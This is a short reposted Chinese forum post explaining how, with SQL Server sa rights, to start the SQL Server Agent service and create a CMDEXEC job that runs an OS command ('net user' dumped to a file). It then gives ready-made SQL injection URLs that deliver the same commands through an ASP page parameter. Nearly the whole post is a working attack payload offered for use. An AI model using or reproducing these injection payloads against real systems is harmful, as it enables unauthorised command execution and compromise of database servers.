[转载]Sa权限使用SQLSERVERAGENT的计划任务运行程序
来源:[url]http://www.haiyang.net/safety/book/show.asp?id=1174[/url]第一步::
exec master.dbo.xp_servicecontrol <|>start<|>,<|>SQLSERVERAGENT<|>
第二步:
use msdb exec sp_delete_job null,<|>x<|> exec sp_add_job <|>x<|> exec sp_add_jobstep Null,<|>x<|>,Null,<|>1<|>,<|>CMDEXEC<|>,<|>cmd /c net user>c:\a.txt<|> exec sp_add_jobserver Null,<|>x<|>,@@servername exec sp_start_job <|>x<|>
就ok了,比如:
[url]http://10.0.0.1/test.asp?a=administrator<[/url]|>;exec%20master.dbo.xp_servicecontrol%20<|>start<|>,<|>SQLSERVERAGENT<|>;--
[url]http://10.0.0.1/test.asp?a=administrator<[/url]|>;use%20msdb%20exec%20sp_delete_job%20null,<|>x<|>%20exec%20sp_add_job%20<|>x<|>%20exec%20sp_add_jobstep%20Null,<|>x<|>,Null,<|>1<|>,<|>CMDEXEC<|>,<|>cmd%20/c%20net%20user>c:\a.txt<|>%20exec%20sp_add_jobserver%20Null,<|>x<|>,@@servername%20exec%20sp_start_job%20<|>x<|>;--
页:
[1]